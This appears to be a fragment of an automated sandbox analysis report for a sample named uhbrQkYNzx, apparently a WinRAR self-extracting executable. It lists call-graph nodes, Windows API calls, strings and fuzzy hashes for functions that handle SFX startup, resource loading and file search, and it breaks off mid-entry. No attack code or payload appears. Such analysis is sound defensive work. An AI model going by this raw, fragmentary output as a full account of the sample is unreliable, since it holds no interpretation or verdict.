9a2c7f 30210 9a2cb3 30209->30210 30235 9a2ab0 30209->30235 30212 9a2cd4 30210->30212 30241 9982a0 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 30210->30241 30242 9a73f8 30212->30242 30215->30209 30217 9a2c76 30215->30217 30239 99fe6f 123 API calls __EH_prolog3 30215->30239 30240 9acdb4 135 API calls __EH_prolog3_GS 30215->30240 30217->30195 30220 9a759c 30219->30220 30221 9a75a1 30219->30221 30258 9a7628 30220->30258 30223 9a75b1 30221->30223 30224 9a77cf 113 API calls 30221->30224 30223->30195 30224->30223 30225->30195 30226->30195 30228 9a77db ResetEvent ReleaseSemaphore 30227->30228 30229 9a7806 30227->30229 30273 9a75ed WaitForSingleObject 30228->30273 30229->30195 30231->30195 30232->30195 30233->30192 30234->30206 30236 9a2ab8 30235->30236 30237 9a2af5 30235->30237 30236->30237 30248 9a8618 30236->30248 30237->30210 30239->30215 30240->30215 30241->30212 30243 9a73ff 30242->30243 30246 9a741a 30243->30246 30256 9992e6 RaiseException CallUnexpected 30243->30256 30245 9a742b SetThreadExecutionState 30245->30217 30246->30245 30257 9992e6 RaiseException CallUnexpected 30246->30257 30251 9b4231 30248->30251 30252 9a60d5 30251->30252 30253 9b4248 SendDlgItemMessageW 30252->30253 30254 9b0678 PeekMessageW GetMessageW IsDialogMessageW TranslateMessage DispatchMessageW 30253->30254 30255 9a8638 30254->30255 30255->30237 30256->30246 30257->30245 30262 9a7633 30258->30262 30263 9a76a1 30258->30263 30259 9a7638 CreateThread 30259->30262 30269 9a7760 30259->30269 30261 9a7690 SetThreadPriority 30261->30262 30262->30259 30262->30261 30262->30263 30266 9992eb 109 API calls __EH_prolog3_GS 30262->30266 30267 999500 109 API calls __EH_prolog3_GS 30262->30267 30268 9992e6 RaiseException CallUnexpected 30262->30268 30263->30221 30266->30262 30267->30262 30268->30262 30272 9a776e 116 API calls 30269->30272 30271 9a7769 30272->30271 30274 9a75fe GetLastError 30273->30274 30278 9a7624 30273->30278 30279 9992eb 109 API calls __EH_prolog3_GS 30274->30279 30276 9a7618 30280 9992e6 RaiseException CallUnexpected 30276->30280 30278->30229 30279->30276 30280->30278 30281->30076 30282->30082 30283->30082 30285 9a2d18 30284->30285 30288 9a2cfe __InternalCxxFrameHandler 30284->30288 30285->30288 30293 99e948 30285->30293 30287 9a2d42 30289 9a73f8 2 API calls 30287->30289 30288->30287 30310 99fe6f 123 API calls __EH_prolog3 30288->30310 30291 9a2d47 30289->30291 30291->30118 30292->30115 30294 99e954 __EH_prolog3_GS 30293->30294 30295 99e963 30294->30295 30296 99e976 GetStdHandle 30294->30296 30308 99e988 30294->30308 30297 9b5787 5 API calls 30295->30297 30296->30308 30299 99eaab 30297->30299 30298 99e9df WriteFile 30298->30308 30299->30288 30300 99e9ad 30301 99e9af WriteFile 30300->30301 30300->30308 30301->30300 30301->30308 30303 99ea77 30304 9914a7 28 API calls 30303->30304 30305 99ea84 30304->30305 30312 999653 109 API calls 30305->30312 30307 99ea97 30309 991a66 26 API calls 30307->30309 30308->30295 30308->30298 30308->30300 30308->30301 30308->30303 30311 999230 111 API calls 30308->30311 30309->30295 30310->30287 30311->30308 30312->30307 30314->29870 30316->29888 30318 99f835 __EH_prolog3_GS 30317->30318 30319 99f925 FindNextFileW 30318->30319 30320 99f847 FindFirstFileW 30318->30320 30321 99f937 GetLastError 30319->30321 30324 99f948 30319->30324 30323 99f86a 30320->30323 30320->30324 30339 99f90d 30321->30339 30325 9a169a 47 API calls 30323->30325 30328 9914a7 28 API calls 30324->30328 30326 99f88c 30325->30326 30329 99f8ac 30326->30329 30332 99f899 30326->30332 30333 99f89c FindFirstFileW 30326->30333 30327 9b5787 5 API calls 30330 99f733 30327->30330 30331 99f95f 30328->30331 30340 99f8e8 30329->30340 30341 9919a9 26 API calls 30329->30341 30330->29658 30330->29662 30334 9a229d 45 API calls 30331->30334 30332->30333 30333->30329 30335 99f970 30334->30335 30338 991a66 26 API calls 30335->30338 30336 99f902 GetLastError 30336->30339 30338->30339 30339->30327 30340->30324 30340->30336 30341->30340 30343 99d6e5 30342->30343 30346 99d70b 30342->30346 30345 99ec63 49 API calls 30343->30345 30343->30346 30345->30343 30378 99d89e 30346->30378 30348 99b231 26 API calls 30349 99d74c 30348->30349 30350 991a66 26 API calls 30349->30350 30351 99d755 30350->30351 30352 991a66 26 API calls 30351->30352 30353 99d75e 30352->30353 30354 9b5734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 30353->30354 30355 99b1bf 30354->30355 30355->29592 30362 9a909b 30355->30362 30360 9a28bb 30356->30360 30358 9a28ed 30359 99fb8e 118 API calls 30358->30359 30361 9a28f8 30359->30361 30383 99fb8e 30360->30383 30363 9a90aa 30362->30363 30364 9a74ec 118 API calls 30363->30364 30365 9a90b9 30363->30365 30364->30365 30394 9a4264 26 API calls 30365->30394 30367 9a90e8 30395 9a4264 26 API calls 30367->30395 30369 9a90f3 30396 9a4264 26 API calls 30369->30396 30371 9a90fe 30397 9a4288 26 API calls 30371->30397 30373 9a9132 30374 992e8b 26 API calls 30373->30374 30375 9a913a 30374->30375 30376 992e8b 26 API calls 30375->30376 30377 9a9142 30376->30377 30379 99d8a8 30378->30379 30380 99d714 30378->30380 30382 99ae77 26 API calls 30379->30382 30380->30348 30382->30380 30384 99fbbb 30383->30384 30386 99fbc2 30383->30386 30387 9a74ec 30384->30387 30386->30358 30388 9a77cf 113 API calls 30387->30388 30389 9a7518 ReleaseSemaphore 30388->30389 30390 9a7538 30389->30390 30391 9a7556 DeleteCriticalSection CloseHandle CloseHandle 30389->30391 30392 9a75ed 111 API calls 30390->30392 30391->30386 30393 9a7542 CloseHandle 30392->30393 30393->30390 30393->30391 30394->30367 30395->30369 30396->30371 30397->30373 30407 9aeac4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 30398->30407 30400 9aeaad 30401 9aeab9 30400->30401 30408 9aeae5 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 30400->30408 30401->29371 30401->29375 30403->29372 30404->29383 30405->29383 30406->29386 30407->30400 30408->30401 30409->29396 30411 99e910 110 API calls 30410->30411 30412 992dc7 30411->30412 30413 9927e0 133 API calls 30412->30413 30416 992de4 30412->30416 30414 992dd4 30413->30414 30414->30416 30421 99204b 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 30414->30421 30416->29406 30416->29407 30418 99279b 30417->30418 30420 992797 30417->30420 30422 9926d2 30418->30422 30420->29412 30421->30416 30423 9926e4 30422->30423 30424 992721 30422->30424 30425 9952d8 133 API calls 30423->30425 30430 995767 30424->30430 30428 992704 30425->30428 30428->30420 30434 995770 30430->30434 30431 9952d8 133 API calls 30431->30434 30432 992742 30432->30428 30435 992c30 30432->30435 30433 9a73f8 2 API calls 30433->30434 30434->30431 30434->30432 30434->30433 30436 992c3c __EH_prolog3_GS 30435->30436 30457 995365 30436->30457 30438 992c8f 30448 992d02 30438->30448 30493 9919a9 26 API calls 30438->30493 30439 9b5787 5 API calls 30441 992d18 30439->30441 30440 992c5a 30440->30438 30442 992c91 30440->30442 30443 992c86 30440->30443 30441->30428 30446 992cb9 30442->30446 30447 992c9a 30442->30447 30489 9a888c 28 API calls 30443->30489 30491 9a8707 29 API calls 2 library calls 30446->30491 30490 9a880e 28 API calls __EH_prolog3 30447->30490 30448->30439 30450 992ca7 30451 9925a4 26 API calls 30450->30451 30453 992caf 30451->30453 30455 991a66 26 API calls 30453->30455 30454 992cd2 30492 992ed0 26 API calls 30454->30492 30455->30438 30458 995380 30457->30458 30459 9953ca 30458->30459 30460 9953ae 30458->30460 30462 995634 30459->30462 30465 9953f6 30459->30465 30494 99204b 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 30460->30494 30500 99204b 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 30462->30500 30464 9b5734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 30466 995659 30464->30466 30467 9a9625 89 API calls 30465->30467 30479 9953b9 30465->30479 30466->30440 30472 995449 30467->30472 30468 99550d 30471 99fd70 28 API calls 30468->30471 30469 99547b 30469->30468 30488 995472 30469->30488 30497 9a2a36 115 API calls 30469->30497 30470 995477 30470->30469 30496 99315d 28 API calls 30470->30496 30478 995520 30471->30478 30472->30469 30472->30470 30473 995467 30472->30473 30495 99204b 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 30473->30495 30476 9a909b 118 API calls 30476->30479 30480 9955b9 30478->30480 30481 9955a9 30478->30481 30479->30464 30483 9a94ea 155 API calls 30480->30483 30482 99d771 155 API calls 30481->30482 30484 9955b7 30482->30484 30483->30484 30498 99fd28 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 30484->30498 30486 9955f1 30486->30488 30499 9932d2 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 30486->30499 30488->30476 30489->30438 30490->30450 30491->30454 30492->30438 30493->30448 30494->30479 30495->30488 30496->30469 30497->30468 30498->30486 30499->30488 30500->30479 30501 9b4a07 30502 9b4910 30501->30502 30503 9b4fce ___delayLoadHelper2@8 17 API calls 30502->30503 30503->30502 30504 991125 30505 9976e7 30 API calls 30504->30505 30506 99112a 30505->30506 30509 9b6029 29 API calls 30506->30509 30508 991134 30509->30508 30510 9a0b05 30511 9a0b17 __cftof 30510->30511 30514 9a76e5 30511->30514 30517 9a76a7 GetCurrentProcess GetProcessAffinityMask 30514->30517 30518 9a0b6f 30517->30518

                                                              Executed Functions

                                                              Function 009B454A Relevance: 40.5, APIs: 18, Strings: 5, Instructions: 252filesleeptimeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 502 9b454a-9b4612 call 9a6d7b call 9a1309 call 9af4d4 call 9b71f0 call 9af89a call 9af84c GetCommandLineW 515 9b46f9-9b4722 call 9a13f9 call 9925a4 call 991a66 502->515 516 9b4618-9b463c call 9914a7 call 9b19ee call 991a66 502->516 529 9b4729-9b4831 SetEnvironmentVariableW GetLocalTime call 99f6ba SetEnvironmentVariableW GetModuleHandleW LoadIconW call 9b07e5 call 9a3538 call 9ad255 * 2 DialogBoxParamW call 9ad347 * 2 515->529 530 9b4724 515->530 531 9b46dc-9b46eb call 9914a7 call 9b3efc 516->531 532 9b4642-9b4659 OpenFileMappingW 516->532 566 9b483a-9b4841 529->566 567 9b4833-9b4834 Sleep 529->567 530->529 543 9b46f0-9b46f4 call 991a66 531->543 535 9b465b-9b4669 MapViewOfFile 532->535 536 9b46d2-9b46da CloseHandle 532->536 535->536 537 9b466b-9b4687 UnmapViewOfFile MapViewOfFile 535->537 536->515 537->536 541 9b4689-9b46cc call 9afc38 call 9b3efc call 9a5109 call 9a51bf call 9a51f8 UnmapViewOfFile 537->541 541->536 543->515 568 9b4848-9b4865 call 9a5041 DeleteObject 566->568 569 9b4843 call 9afb4b 566->569 567->566 573 9b486e-9b4874 568->573 574 9b4867-9b4868 DeleteObject 568->574 569->568 575 9b488e-9b489c 573->575 576 9b4876-9b487d 573->576 574->573 578 9b489e-9b48aa call 9b3fcf CloseHandle 575->578 579 9b48b0-9b48bd 575->579 576->575 577 9b487f-9b4889 call 9994b8 576->577 577->575 578->579 582 9b48bf-9b48cb 579->582 583 9b48e1-9b48e5 call 9af53a 579->583 586 9b48db-9b48dd 582->586 587 9b48cd-9b48d5 582->587 588 9b48ea-9b4903 call 9b5734 583->588 586->583 590 9b48df 586->590 587->583 589 9b48d7-9b48d9 587->589 589->583 590->583
                                                              APIs
                                                                • Part of subcall function 009A6D7B: GetModuleHandleW.KERNEL32(kernel32,1AC349C0), ref: 009A6DC7
                                                                • Part of subcall function 009A6D7B: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 009A6DD9
                                                                • Part of subcall function 009A6D7B: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 009A6E03
                                                                • Part of subcall function 009A1309: __EH_prolog3.LIBCMT ref: 009A1310
                                                                • Part of subcall function 009A1309: GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,009A17FB,?,?,\\?\,1AC349C0,?,?,?,00000000,009CA279,000000FF), ref: 009A1319
                                                                • Part of subcall function 009AF4D4: OleInitialize.OLE32(00000000), ref: 009AF4ED
                                                                • Part of subcall function 009AF4D4: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 009AF524
                                                                • Part of subcall function 009AF4D4: SHGetMalloc.SHELL32(009E532C), ref: 009AF52E
                                                              • GetCommandLineW.KERNEL32 ref: 009B4608
                                                              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp,?,00000000), ref: 009B464F
                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000009,?,00000000), ref: 009B4661
                                                              • UnmapViewOfFile.KERNEL32(00000000,?,00000000), ref: 009B466F
                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,?,?,00000000), ref: 009B467D
                                                                • Part of subcall function 009AFC38: __EH_prolog3.LIBCMT ref: 009AFC3F
                                                                • Part of subcall function 009B3EFC: __EH_prolog3_GS.LIBCMT ref: 009B3F03
                                                                • Part of subcall function 009B3EFC: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?,?,?,?,?,?,00000028), ref: 009B3F1B
                                                                • Part of subcall function 009B3EFC: SetEnvironmentVariableW.KERNEL32(sfxpar,?,?,?,?,?,?,?,00000028), ref: 009B3F86
                                                                • Part of subcall function 009A51BF: _wcslen.LIBCMT ref: 009A51E3
                                                              • UnmapViewOfFile.KERNEL32(00000000,009E5430,00000400,009E5430,009E5430,00000400,00000000,00000001,?,00000000), ref: 009B46CC
                                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 009B46D3
                                                              • SetEnvironmentVariableW.KERNEL32(sfxname,009D9698,00000000), ref: 009B472F
                                                              • GetLocalTime.KERNEL32(?), ref: 009B473A
                                                              • _swprintf.LIBCMT ref: 009B4779
                                                              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 009B478E
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 009B4795
                                                              • LoadIconW.USER32(00000000,00000064), ref: 009B47AC
                                                              • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_00020900,00000000), ref: 009B4803
                                                              • Sleep.KERNELBASE(00001B58), ref: 009B4834
                                                              • DeleteObject.GDI32 ref: 009B4858
                                                              • DeleteObject.GDI32(17050D3A), ref: 009B4868
                                                                • Part of subcall function 009914A7: _wcslen.LIBCMT ref: 009914B8
                                                                • Part of subcall function 009B19EE: __EH_prolog3_GS.LIBCMT ref: 009B19F5
                                                              • CloseHandle.KERNEL32 ref: 009B48AA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: File$EnvironmentHandleVariableView$AddressCloseDeleteH_prolog3H_prolog3_ModuleObjectProcUnmap_wcslen$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingOpenParamSleepStartupTime_swprintf
                                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                              • API String ID: 3142445277-3710569615
                                                              • Opcode ID: 8eb112bbdb6d096577933c033aeeb9452921d88a8d329fc44b829535eead79c5
                                                              • Instruction ID: b0985430756f33a8d19b08ee2db24ce3d71462a20e61d56148daea5c3ec6043f
                                                              • Opcode Fuzzy Hash: 8eb112bbdb6d096577933c033aeeb9452921d88a8d329fc44b829535eead79c5
                                                              • Instruction Fuzzy Hash: 4891D1B0918384EFD320EF65DC85FAB7BECAB89704F41082DF54996192DB749D04EB62
                                                              Function 009AEBD3 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 608 9aebd3-9aebf0 FindResourceW 609 9aecec 608->609 610 9aebf6-9aec07 SizeofResource 608->610 611 9aecee-9aecf2 609->611 610->609 612 9aec0d-9aec1c LoadResource 610->612 612->609 613 9aec22-9aec2d LockResource 612->613 613->609 614 9aec33-9aec48 GlobalAlloc 613->614 615 9aec4e-9aec57 GlobalLock 614->615 616 9aece4-9aecea 614->616 617 9aecdd-9aecde GlobalFree 615->617 618 9aec5d-9aec7b call 9b6c70 CreateStreamOnHGlobal 615->618 616->611 617->616 621 9aec7d-9aec9f call 9aeb06 618->621 622 9aecd6-9aecd7 GlobalUnlock 618->622 621->622 627 9aeca1-9aeca9 621->627 622->617 628 9aecab-9aecbf GdipCreateHBITMAPFromBitmap 627->628 629 9aecc4-9aecd2 627->629 628->629 630 9aecc1 628->630 629->622 630->629
                                                              APIs
                                                              • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,009B0845,00000066), ref: 009AEBE6
                                                              • SizeofResource.KERNEL32(00000000,?,?,?,009B0845,00000066), ref: 009AEBFD
                                                              • LoadResource.KERNEL32(00000000,?,?,?,009B0845,00000066), ref: 009AEC14
                                                              • LockResource.KERNEL32(00000000,?,?,?,009B0845,00000066), ref: 009AEC23
                                                              • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,009B0845,00000066), ref: 009AEC3E
                                                              • GlobalLock.KERNEL32(00000000), ref: 009AEC4F
                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 009AEC73
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 009AECD7
                                                                • Part of subcall function 009AEB06: GdipAlloc.GDIPLUS(00000010), ref: 009AEB0C
                                                              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 009AECB8
                                                              • GlobalFree.KERNEL32(00000000), ref: 009AECDE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                              • String ID: PNG
                                                              • API String ID: 211097158-364855578
                                                              • Opcode ID: d84a78297119b6892cc054f8a7cbbfc7e1d7fa30742ca696d1019b35b8387dd3
                                                              • Instruction ID: e0128735ccdb2bd8f0fa1f4487a8c1a39e99c5a2875d5b844a2fdd1f591a1be3
                                                              • Opcode Fuzzy Hash: d84a78297119b6892cc054f8a7cbbfc7e1d7fa30742ca696d1019b35b8387dd3
                                                              • Instruction Fuzzy Hash: F13170B1A19201AFD710AF62DD48E2BBFBCFF86764B040529F945D2261EB31DC01DBA1
                                                              Function 009A355D Relevance: 14.8, APIs: 2, Strings: 6, Instructions: 753COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 009A8781: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,1AC349C0,00000007,?,?,?,009A8751,?,?,?,?,0000000C,00994426), ref: 009A879D
                                                              • _wcslen.LIBCMT ref: 009A395A
                                                              • __fprintf_l.LIBCMT ref: 009A3AA7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__fprintf_l_wcslen
                                                              • String ID: ,$$%s:$*messages***$*messages***$@%s:$RTL
                                                              • API String ID: 1796436225-285229759
                                                              • Opcode ID: 5b40d9d49fe92ea0f4c68491722e11ab76512b2229f9be1c2964b47690af61b0
                                                              • Instruction ID: 1ccdd8c00488cdd50122db7b415a93b9993ce83d1b25d220e79b825b7a80f2b9
                                                              • Opcode Fuzzy Hash: 5b40d9d49fe92ea0f4c68491722e11ab76512b2229f9be1c2964b47690af61b0
                                                              • Instruction Fuzzy Hash: 8852C471900259EBDF24DFA8CD85BEEB7B8FF45714F10452AF805AB281EB719A44CB90
                                                              Function 0099F826 Relevance: 9.1, APIs: 6, Instructions: 139fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1006 99f826-99f841 call 9b57d8 1009 99f925-99f935 FindNextFileW 1006->1009 1010 99f847-99f84d 1006->1010 1011 99f948-99f9fa call 9925c3 call 9914a7 call 9a229d call 991a66 call 9a7c44 * 3 1009->1011 1012 99f937-99f946 GetLastError 1009->1012 1013 99f84f 1010->1013 1014 99f851-99f864 FindFirstFileW 1010->1014 1018 99f9ff-99fa0a call 9b5787 1011->1018 1015 99f91d-99f920 1012->1015 1013->1014 1014->1011 1017 99f86a-99f88e call 9a169a 1014->1017 1015->1018 1024 99f8ac-99f8b6 1017->1024 1025 99f890-99f897 1017->1025 1030 99f8b8-99f8d3 1024->1030 1031 99f8fd-99f900 1024->1031 1028 99f899 1025->1028 1029 99f89c-99f8aa FindFirstFileW 1025->1029 1028->1029 1029->1024 1033 99f8d5-99f8ee call 9919a9 1030->1033 1034 99f8f4-99f8fc call 9b5726 1030->1034 1031->1011 1036 99f902-99f90b GetLastError 1031->1036 1033->1034 1034->1031 1040 99f91b 1036->1040 1041 99f90d-99f910 1036->1041 1040->1015 1041->1040 1045 99f912-99f915 1041->1045 1045->1040 1046 99f917-99f919 1045->1046 1046->1015
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 0099F830
                                                              • FindFirstFileW.KERNELBASE(?,?,00000274,0099F733,000000FF,00000049,00000049,?,?,0099A684,?,?,00000000,?,?,?), ref: 0099F859
                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,0099D303,?,?,?,?,?,?,?,1AC349C0,00000049), ref: 0099F8A4
                                                              • GetLastError.KERNEL32(?,?,?,0099D303,?,?,?,?,?,?,?,1AC349C0,00000049,?,00000000), ref: 0099F902
                                                              • FindNextFileW.KERNEL32(?,?,00000274,0099F733,000000FF,00000049,00000049,?,?,0099A684,?,?,00000000,?,?,?), ref: 0099F92D
                                                              • GetLastError.KERNEL32(?,0099D303,?,?,?,?,?,?,?,1AC349C0,00000049,?,00000000), ref: 0099F93A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: FileFind$ErrorFirstLast$H_prolog3_Next
                                                              • String ID:
                                                              • API String ID: 3831798110-0
                                                              • Opcode ID: 2fe4d48156078b82f7fec311728294c034d6106231283ba85e13fae6fcb5be7f
                                                              • Instruction ID: ae14d79aedd9abf5e5361a6dbac8b7da1015df790de09b9be45064ec72746692
                                                              • Opcode Fuzzy Hash: 2fe4d48156078b82f7fec311728294c034d6106231283ba85e13fae6fcb5be7f
                                                              • Instruction Fuzzy Hash: 10511F71904619EFCF54DF68C899BDDB7B8BF49320F1002AAE519E3290DB34AA94CF50
                                                              Function 0099BF3D Relevance: 5.0, APIs: 1, Strings: 1, Instructions: 1497COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 0099C342
                                                                • Part of subcall function 009A2095: __EH_prolog3_GS.LIBCMT ref: 009A209C
                                                                • Part of subcall function 009957C0: __EH_prolog3.LIBCMT ref: 009957C7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3H_prolog3__wcslen
                                                              • String ID: __tmp_reference_source_
                                                              • API String ID: 1523997010-685763994
                                                              • Opcode ID: 9e5ff1eaa099c71124c138286d29a3e54e9335b354af26d0215a92e544bfa4f5
                                                              • Instruction ID: 1a55eb9c47b009bf883efb6b7a9fb5335d861e34b6a3513cdd9a76b964f62f7b
                                                              • Opcode Fuzzy Hash: 9e5ff1eaa099c71124c138286d29a3e54e9335b354af26d0215a92e544bfa4f5
                                                              • Instruction Fuzzy Hash: 04D2E5B09052899FDF29DFB8CC91BEEBBB8BF45304F04451EE49A97241DB34A949CB50
                                                              Function 009BECAA Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(00000000,?,009BEC80,00000000,009D6F40,0000000C,009BEDD7,00000000,00000002,00000000), ref: 009BECCB
                                                              • TerminateProcess.KERNEL32(00000000,?,009BEC80,00000000,009D6F40,0000000C,009BEDD7,00000000,00000002,00000000), ref: 009BECD2
                                                              • ExitProcess.KERNEL32 ref: 009BECE4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentExitTerminate
                                                              • String ID:
                                                              • API String ID: 1703294689-0
                                                              • Opcode ID: c749a8e1393df05b47bc23080d7b4a459040247dbc6827c5b897b3cf909eda01
                                                              • Instruction ID: 26feefaae751f3a4df3bd4def6a64c9ee8188db03d6712103c8bee441410b860
                                                              • Opcode Fuzzy Hash: c749a8e1393df05b47bc23080d7b4a459040247dbc6827c5b897b3cf909eda01
                                                              • Instruction Fuzzy Hash: 7FE04672814208AFCF11AF54CE08E983F2DEF81391B044424F8499A522CB36ED42EB40
                                                              Function 009AB76F Relevance: .4, Instructions: 353COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
